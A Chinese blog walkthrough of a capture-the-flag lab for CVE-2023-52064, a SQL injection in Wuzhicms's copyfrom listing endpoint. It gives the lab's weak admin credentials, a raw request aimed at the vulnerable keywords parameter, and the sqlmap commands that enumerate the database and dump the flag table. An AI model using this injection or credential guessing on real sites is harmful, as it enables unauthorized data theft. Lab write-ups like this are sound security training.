春秋云境CVE-2023-52064

已于 2024-04-08 10:50:24 修改
阅读量593 收藏 7
点赞数 8
分类专栏: web安全靶场合集 文章标签: 安全 web安全
于 2024-04-08 10:47:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shr592833253/article/details/137498157
版权

进入靶场后会看到如下画面

在尝试目录扫描后未发现有用的路径

根据靶场提示,可以得知CMS为Wuzhicms,于是上网搜索相对应的Sql注入漏洞

发现http://IP:端口/www/index.php?m=core&f=index&_su=wuzhicms

可以进入到登录界面

可由暴力破解或信息收集得到

账号为admin,密码为admin123

登录成功后,可得如下界面

然后构造POC

GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1 HTTP/1.1
Host: 你的IP
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1710990068; _ga=GA1.2.70323571.1712124646; _ga_J1DQF09WZC=GS1.2.1712124647.1.1.1712125047.0.0.0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1712538461; PHPSESSID=0b2930da5b333118b6c07edeada52bf0; Jun_uid=9988J6B6QqW4gppsWSliOXoCz0qdvILetqwfzqwG; Jun_username=8f40r1Lhw7JFdEQFlT%2FkLf00b6Jk682Lqb5dqiQCGK16uA; Jun_wz_name=85a81VrtQAYnNfYmbyH9z2zX7%2FZnON69uH3NO4v3JiHT8g; Jun_siteid=278drzZMMKo8R4AFby8LK6deMpm%2BfeA520Hk%2B9Ih
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在kali上执行命令 sqlmap -r xxx.txt --dbs --batch   (xxx.txt为你所构造的POC)

然后执行 sqlmap -r xxx.txt -D wuzhicms --tables

再次执行  sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns 

最后执行  sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump

得到flag!

咦哈~
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 NetScaler Gateway 14.1-12.35 及更高版本 NetScaler ADC 和 NetScaler Gateway 13.1-51.15 及更高版本的 13.1 NetScaler ADC 和 NetScaler Gateway 13.0-92.21 及更高版本的 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 及更高版本的 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1- 版本:Citrix ADC-13.0-92.21
春秋云境CVE-2023-27372
m0_64432806的博客
03-16 504
SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 553
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
安全漏洞周报(2023.12.04-2023.12.11)
Enlink_Young的博客
12-12 196
易安联专注零信任安全,先后发布EnSDP(零信任安界防护平台)、EnBox(零信任安全工作空间)、EnCASB(零信任云应用安全接入平台)、EnAppGate(统一资源发布系统)、EnIAM(零信任身份管理平台)、EnDTA(天织·DTA威胁分析系统)等多款产品及解决方案,推出ZTNA零信任网络架构解决方案和EnSASE安全访问服务边缘解决方案并提供包括安全运维、实战攻防、应急演练等安全服务。推出的威胁情报和天织DNS威胁分析平台,可以为用户提供高效的威胁防护能力,帮助用户更好地应对各类网络威胁。
2022-2023年十大漏洞CVE编号
sunrong1027的博客
03-27 1102
2022-23经典十大漏洞CVE编号
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
CVE-2023-25157-main(1).zip
07-19
复现GeoServer CVE-2023-25157 SQL注入
五指CMS copyfrom.php SQL注入漏洞复现(CVE-2023-52064)
0xSec
01-16 511
Wuzhicms 内容管理系统的/core/admin/copyfrom.php $keywords参数存在SQL注入漏洞,经过身份验证的攻击者可通过该漏洞获取数据库中的信息之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
春秋云镜】CVE-2023-52064标靶Wp
KKleeeaa的博客
04-01 256
因为这个是WuZhiCMS,然后这里刚好我的博客里面介绍了有一个Day,不知道的小伙半,可以看看我的漏洞复现的文章,里面有个五指CMS的文章哦。这里抓包 把GET数据包 用SQLmap跑,这里注意下,GET数据包里,keyword=1* 其余删掉 后面的。然后直接上Day,有day就打day奥,打出来数据库为wuzhicms,不用我多说了吧直接flag展示奥。弱密码自己猜测奥,锻炼你自己,可以通过信息收集查询奥,小伙伴们加油!输入来篡改SQL语句的结构,执行恶意的SQL命令。这里直接弱密码,尝试进去后台。
CVE-2023-50164 Apache Struts2漏洞复现
黑剑
12-15 2863
从本质上讲,该漏洞允许攻击者利用 Apache Struts 文件上传系统中的缺陷。它允许他们操纵文件上传参数并执行路径遍历。这种利用可能会导致在服务器上执行任意代码,从而导致各种后果,例如未经授权的数据访问、系统受损,甚至完全控制受影响的系统,包括在系统中放置恶意文件。仔细一看,CVE-2023-50164涉及Apache Struts的文件上传机制中的一个漏洞。对于非技术受众,想象一下这样一个场景:安全检查点(文件上传机制)由于漏洞而被绕过,从而允许未经授权的访问安全区域(服务器)。
Error系列-CVE CIS-2023系统漏洞处理方案集合
tangdou369098655的博客
06-06 5990
网络安全-CVE - CIS 漏洞分析以及解决
春秋云境-CVE-2020-17530
qq_63265389的博客
04-15 335
CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。当对标签属性中的原始用户输入进行评估时,强制 OGNL 评估可能会导致远程代码执行。找一下poc nothing很烦有了Apache Struts 框架在强制时,会对分配给某些标签属性(如 id)的属性值执行双重评估。因此,可以将一个值传递给 Struts,该值将在呈现标签的属性时再次评估。通过精心构建的请求,这可能会导致远程代码执行。
登录安全分析报告:小米官网注册
最新发布
Explinks的博客
05-29 1333
图形验证及交互验证方式的安全性到底如何?请看具体分析。
nginx 安全配置
fangxiang2008的博客
05-28 1113
nginx 安全配置
Dynamics 365:安全的客户参与应用程序
全网:架构师研究会
05-29 899
客户参与应用程序使用Microsoft Dataverse提供了一个丰富的安全模型,可以适应许多业务场景。本节为您提供了应考虑的安全措施的特定于产品的指导。Dataverse安全模型有以下目标:只允许用户访问他们工作所需的信息。按角色对用户进行分组,并根据这些角色限制访问权限。支持数据共享,以便用户和团队可以访问他们不拥有的记录以进行特定的协作。阻止用户访问他们不拥有或共享的记录。了解有关Mic...
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值